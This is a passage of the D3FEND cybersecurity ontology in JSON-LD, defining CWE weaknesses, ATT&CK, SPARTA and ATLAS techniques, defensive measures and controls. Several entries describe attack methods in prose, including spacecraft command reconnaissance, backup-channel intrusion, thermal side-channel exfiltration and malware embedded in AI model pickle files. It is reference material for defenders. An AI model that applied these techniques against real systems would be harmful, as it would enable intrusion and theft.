      "rdfs:label": "Traffic Analysis Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Traffic Analysis Attacks"
    },
    {
      "@id": "d3f:AsymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AFTL",
      "d3f:definition": "Homogeneous (where the metrics are the same for both source and target) asymmetric transformation mapping transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Asymmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1101",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1101",
      "d3f:definition": "The product uses automatically-generated code that cannot be executed without a specific runtime support component.",
      "rdfs:label": "Reliance on Runtime Component in Generated Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:MSGEmailFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Email"
      ],
      "rdfs:label": "MSG Email File"
    },
    {
      "@id": "d3f:CWE-1261",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1261",
      "d3f:definition": "The hardware logic does not effectively handle when single-event upsets (SEUs) occur.",
      "rdfs:label": "Improper Handling of Single Event Upsets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:AuthenticateUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Authenticate User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N4f48663192e84f97b7fb27d787fcf5a4"
        }
      ]
    },
    {
      "@id": "_:N4f48663192e84f97b7fb27d787fcf5a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-001086_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001086"
    },
    {
      "@id": "d3f:ATTACKICSImpairProcessControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to manipulate, disable, or damage physical control processes.",
      "d3f:enables": {
        "@id": "d3f:TA0106"
      },
      "rdfs:label": "Impair Process Control Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N97e7e1535af44a158047d1581d9d433b"
        }
      ],
      "skos:prefLabel": "Impair Process Control Technique"
    },
    {
      "@id": "_:N97e7e1535af44a158047d1581d9d433b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0106"
      }
    },
    {
      "@id": "d3f:CCI-001494_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized modification.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001494"
    },
    {
      "@id": "d3f:CWE-770",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-770",
      "d3f:definition": "The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.",
      "rdfs:label": "Allocation of Resources Without Limits or Throttling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-400"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:ApplicationConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:definition": "A file containing Information used to configure the parameters and initial settings for an application.. A plist file is an example of this type of file for macOS.  Usually text-based.",
      "rdfs:label": "Application Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "_:N4cc4275b98e0450a9e5ea774478dc0fd"
        }
      ]
    },
    {
      "@id": "_:N4cc4275b98e0450a9e5ea774478dc0fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Limit Library Privileges",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(6)"
    },
    {
      "@id": "d3f:CWE-335",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-335",
      "d3f:definition": "The product uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.",
      "rdfs:label": "Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:T1141",
      "@type": "owl:Class",
      "d3f:attack-id": "T1141",
      "d3f:definition": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1056.002",
      "rdfs:label": "Input Prompt",
      "rdfs:seeAlso": {
        "@id": "d3f:T1056.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:AnalyticTechnique",
      "@type": "owl:Class",
      "d3f:definition": "A process in which a computer examines information using mathematical methods in order to find useful patterns.",
      "rdfs:isDefinedBy": {
        "@id": "https://dictionary.cambridge.org/us/dictionary/english/analytics"
      },
      "rdfs:label": "Analytic Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:Technique"
      }
    },
    {
      "@id": "d3f:CWE-170",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-170",
      "d3f:definition": "The product does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.",
      "rdfs:label": "Improper Null Termination",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:OperatingModeRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingModeRestriction"
      ],
      "d3f:d3fend-id": "D3-OPR",
      "d3f:definition": "Restricting unauthorized changes to the operating mode prevents devices from switching into inappropriate or vulnerable states during normal use.",
      "d3f:kb-article": "## How it works\nMany OT Controllers use key switches to change the controller into different modes of operation. These modes of operation can include Program, Run, Remote, or Stop.\n\nThe key switch should be left in the appropriate key switch position, e.g., run or remote during normal operations.\n\nImplement a key management procedure to include removing the physical key from the key switch when not in use.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MITREATTACKAuthorizationEnforcement"
        },
        {
          "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS"
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Operating Mode Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Na669243fc6014072b0f3a165a45d512e"
        }
      ]
    },
    {
      "@id": "_:Na669243fc6014072b0f3a165a45d512e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.unc.edu/~fabian/course_papers/polymorphic-detect.pdf"
      },
      "d3f:kb-author": "Michalis Polychronakis",
      "d3f:kb-reference-of": {
        "@id": "d3f:ByteSequenceEmulation"
      },
      "d3f:kb-reference-title": "Network-level polymorphic shellcode detection using emulation",
      "rdfs:label": "Reference - Network-level polymorphic shellcode detection using emulation"
    },
    {
      "@id": "d3f:CWE-190",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-190",
      "d3f:definition": "The product performs a calculation that can produce an integer overflow or wraparound when the logic assumes that the resulting value will always be larger than the original value. This occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may become a very small or negative number.",
      "d3f:synonym": [
        "Overflow",
        "Wraparound",
        "wrap, wrap-around, wrap around"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:MathematicalFunction"
      },
      "rdfs:label": "Integer Overflow or Wraparound",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-682"
        },
        {
          "@id": "_:Nce1716b05f1e487b8cc028d3881805aa"
        }
      ]
    },
    {
      "@id": "_:Nce1716b05f1e487b8cc028d3881805aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MathematicalFunction"
      }
    },
    {
      "@id": "d3f:Reference-SMBEventsMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-01-003/"
      },
      "d3f:kb-abstract": "Server Message Block (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve Lateral Movement. Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.\n\nOutput Description:\nThe source, destination, content, and time of each event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-01-003: SMB Events Monitoring",
      "rdfs:label": "Reference - CAR-2013-01-003: SMB Events Monitoring - MITRE"
    },
    {
      "@id": "d3f:ScheduledJobDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a scheduled task is deactivated, preventing further execution until re-enabled.",
      "rdfs:label": "Scheduled Job Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N097b34f3186a42fa96cfa2f7b54f5767"
        }
      ]
    },
    {
      "@id": "_:N097b34f3186a42fa96cfa2f7b54f5767",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobEnableEvent"
      }
    },
    {
      "@id": "d3f:CWE-601",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-601",
      "d3f:definition": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.",
      "d3f:synonym": [
        "Cross-domain Redirect",
        "Cross-site Redirect",
        "Open Redirect",
        "Unvalidated Redirect"
      ],
      "rdfs:label": "URL Redirection to Untrusted Site ('Open Redirect')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:REC-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.02",
      "d3f:definition": "Threat actors study how commands are formed, authorized, scheduled, and delivered. High-value details include the telecommand protocol (e.g., CCSDS TC), framing and CRC/MAC fields, authentication scheme (keys, counters, anti-replay windows), command dictionary/database formats, critical-command interlocks and enable codes, rate and size limits, timetag handling, command queue semantics, and the roles of scripts or procedures that batch actions. They also collect rules governing “valid commanding periods”: line-of-sight windows, station handovers, maintenance modes, safing states, timeouts, and when rapid-response commanding is permitted. With this, an adversary can craft syntactically valid traffic, time injections to coincide with reduced monitoring, or induce desynchronization (e.g., counter resets, stale timetags).",
      "rdfs:label": "Commanding Details - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Commanding Details"
    },
    {
      "@id": "d3f:controlled-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x controlled-by y: x's operation or behavior is directed or regulated by y.",
      "owl:inverseOf": {
        "@id": "d3f:controls"
      },
      "rdfs:label": "controlled-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:GatedRecurrentUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GRU",
      "d3f:definition": "The GRU is like a long short-term memory (LSTM) with a forget gate, but has fewer parameters than LSTM, as it lacks an output gate. GRU's performance on certain tasks of polyphonic music modeling, speech signal modeling and natural language processing was found to be similar to that of LSTM",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 20). Gated Recurrent Unit. [Link](https://en.wikipedia.org/wiki/Gated_recurrent_unit)",
      "rdfs:label": "Gated Recurrent Unit",
      "rdfs:subClassOf": {
        "@id": "d3f:RecurrentNeuralNetwork"
      }
    },
    {
      "@id": "d3f:CredentialManagementSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Credential Management, also referred to as a Credential Management System (CMS), is an established form of software that is used for issuing and managing credentials as part of public key infrastructure (PKI).",
      "d3f:manages": {
        "@id": "d3f:Credential"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Credential_Management"
      },
      "rdfs:label": "Credential Management System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N485d5ba5c86649cba8a65dddd3e11e78"
        }
      ]
    },
    {
      "@id": "_:N485d5ba5c86649cba8a65dddd3e11e78",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ProcessTerminationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the cessation of a process, including resource deallocation and cleanup, either due to normal completion or abnormal termination.",
      "rdfs:label": "Process Termination Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N5c99d0feb54a4eeeb86a5335a157ddcd"
        }
      ]
    },
    {
      "@id": "_:N5c99d0feb54a4eeeb86a5335a157ddcd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:DetectionEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event capturing the identification of a potential security issue, such as unauthorized access attempts, policy violations, or anomalous activities. Detection events form the foundation of cybersecurity monitoring and response.",
      "d3f:related": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Detection Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/categories/findings"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:PhysicalEnclosureHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalEnclosureHardening"
      ],
      "d3f:d3fend-id": "D3-PEH",
      "d3f:definition": "Physical changes to a computer enclosure which reduce the ability for agents or the environment to affect the contained computer system.",
      "d3f:hardens": {
        "@id": "d3f:ComputerEnclosure"
      },
      "d3f:kb-article": "## How it works\n\nSystem designers or operators make physical changes to a computer enclosure which reduce the ability for agents or the environment to affect the contained computer system. These additions to the enclosure may be of various materials to reduce the effects of heat, gases, vibration, or agent access.\n\n## Considerations\n\n* Use asset inventory tools to track physical equipment and monitor both people and devices for access control.\n* Consider relevant regulations to ensure enclosures are in compliance.\n\n* Properly hardened enclosures should be installed and maintained to ensure they are operable and free of tampering. Access to these enclosures is controlled through physical barriers, such as locks and bolts, and may include tamper-evident hardware.\n\n* Records should be maintained concerning maintenance performed, access, and any possible tampering marks or associated incidents.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        }
      ],
      "rdfs:label": "Physical Enclosure Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N8d00f7ff548743ebbc5e99ecb6a92fe0"
        }
      ]
    },
    {
      "@id": "_:N8d00f7ff548743ebbc5e99ecb6a92fe0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:SystemFileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemFileAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:d3fend-id": "D3-SFA",
      "d3f:definition": "Monitoring system files such as authentication databases, configuration files, system logs, and system executables for modification or tampering.",
      "d3f:kb-article": "## How it works\nThis technique ensures the integrity of system owned file resources. System files can impact the behavior below the user level.\n\n\n## Considerations\n* Need to manage the size of log file analysis.\n* False positives are a concern with this technique and filtering will need to be given additional thought.\n* A baseline or snapshot of file checksums should be established for future comparison.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AccessPermissionModification_MITRE"
        },
        {
          "@id": "d3f:Reference-AutorunDifferences_MITRE"
        },
        {
          "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE"
        }
      ],
      "rdfs:label": "System File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N896204c6261b40a5a12803d47d18eec8"
        }
      ]
    },
    {
      "@id": "_:N896204c6261b40a5a12803d47d18eec8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:CWE-181",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-181",
      "d3f:definition": "The product validates data before it has been filtered, which prevents the product from detecting data that becomes invalid after the filtering step.",
      "d3f:synonym": "Validate-before-cleanse",
      "rdfs:label": "Incorrect Behavior Order: Validate Before Filter",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-179"
      }
    },
    {
      "@id": "d3f:PermissionGrantingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrative event where authorization is given, allowing a subject to perform specific operations on a protected resource, effectuating a policy decision to allow access rights.",
      "rdfs:label": "Permission Granting Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/user_access"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlAdministrationEvent"
      }
    },
    {
      "@id": "d3f:T1576",
      "@type": "owl:Class",
      "d3f:attack-id": "T1576",
      "d3f:definition": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.001",
      "rdfs:label": "Uninstall Malicious Application - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Uninstall Malicious Application"
    },
    {
      "@id": "d3f:EXF-0002.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.05",
      "d3f:definition": "Threat actors can leverage thermal imaging attacks (e.g., infrared images) to measure heat that is emitted as a means to exfiltrate information from spacecraft processors. Thermal attacks rely on temperature profiling using sensors to extract critical information from the chip(s). The availability of highly sensitive thermal sensors, infrared cameras, and techniques to calculate power consumption from temperature distribution [7] has enhanced the effectiveness of these attacks. As a result, side-channel attacks can be performed by using temperature data without measuring power pins of the chip.",
      "rdfs:label": "Thermal Imaging attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Thermal Imaging attacks"
    },
    {
      "@id": "d3f:T1544",
      "@type": "owl:Class",
      "d3f:attack-id": "T1544",
      "d3f:definition": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel  or through alternate protocols with another tool such as FTP.",
      "rdfs:label": "Ingress Tool Transfer - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Ingress Tool Transfer"
    },
    {
      "@id": "d3f:TemporalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TL",
      "d3f:definition": "Temporal logic addresses the semantics of tense; i.e., qualifying expressions of when.",
      "d3f:kb-article": "## References\n1. Temporal logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Temporal_logic)",
      "rdfs:label": "Temporal Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:IA-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004",
      "d3f:definition": "Adversaries pursue alternative paths to the spacecraft that differ from the primary TT&C in configuration, monitoring, or authentication. Examples include backup MOC/ground networks, contingency TT&C chains, maintenance or recovery consoles, low-rate emergency beacons, and secondary receivers or antennas on the vehicle. These channels exist to preserve commandability during outages, safing, or maintenance; they may use different vendors, legacy settings, or simplified procedures. Initial access typically pairs reconnaissance of failover rules with actions that steer operations onto the backup path, natural events, induced denial on the primary, or simple patience until scheduled tests and handovers occur. Once traffic flows over the alternate path, the attacker leverages its distinct procedures, dictionaries, or rate/size limits to introduce commands or data that would be harder to inject on the primary.",
      "rdfs:label": "Secondary/Backup Communication Channel - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Secondary/Backup Communication Channel"
    },
    {
      "@id": "d3f:T1177",
      "@type": "owl:Class",
      "d3f:attack-id": "T1177",
      "d3f:definition": "The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.008",
      "rdfs:label": "LSASS Driver",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1590.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.004",
      "d3f:definition": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.",
      "rdfs:label": "Network Topology",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:CWE-547",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-547",
      "d3f:definition": "The product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.",
      "rdfs:label": "Use of Hard-coded, Security-relevant Constants",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-1086",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1086",
      "d3f:definition": "A class contains an unnecessarily large number of children.",
      "rdfs:label": "Class with Excessive Number of Child Classes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CWE-827",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-827",
      "d3f:definition": "The product does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the product to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker.",
      "rdfs:label": "Improper Control of Document Type Definition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-706"
        },
        {
          "@id": "d3f:CWE-829"
        }
      ]
    },
    {
      "@id": "d3f:RemoteCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote command is an instruction or set of instructions issued from a geographically or logically distant location to control, configure, or elicit a response from a target system, device, or entity. The execution of a remote command does not require direct physical interaction with the target; instead, it relies on a communication link to transmit the instruction and receive any resulting feedback or data.",
      "rdfs:label": "Remote Command",
      "rdfs:subClassOf": {
        "@id": "d3f:Command"
      }
    },
    {
      "@id": "d3f:CWE-489",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-489",
      "d3f:definition": "The product is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.",
      "d3f:synonym": "Leftover debug code",
      "rdfs:label": "Active Debug Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:AML.T0018.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.002",
      "d3f:definition": "Adversaries may embed malicious code into AI Model files.\nAI models may be packaged as a combination of instructions and weights.\nSome formats such as pickle files are unsafe to deserialize because they can contain unsafe calls such as exec.\nModels with embedded malware may still operate as expected.\nIt may allow them to achieve Execution, Command & Control, or Exfiltrate Data.",
      "rdfs:label": "Embed Malware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Embed Malware"
    },
    {
      "@id": "d3f:OTProgramModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command that places the controller in a mode capable of reprogramming logic. This may or may not stop the program.",
      "rdfs:label": "OT Program Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N51c99dd1222b49b2a2df0224e098ace0"
        },
        {
          "@id": "_:N9d4029c54bd84a67aa3c7d011777c65d"
        }
      ]
    },
    {
      "@id": "_:N51c99dd1222b49b2a2df0224e098ace0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N9d4029c54bd84a67aa3c7d011777c65d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProgramModeCommand"
      }
    },
    {
      "@id": "d3f:HardwareDeviceEnabledEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device becomes operational and available for use, typically following initialization, activation, or repair.",
      "rdfs:label": "Hardware Device Enabled Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N89081a1b1c0d483abddee55d6b2c0c2b"
        }
      ]
    },
    {
      "@id": "_:N89081a1b1c0d483abddee55d6b2c0c2b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
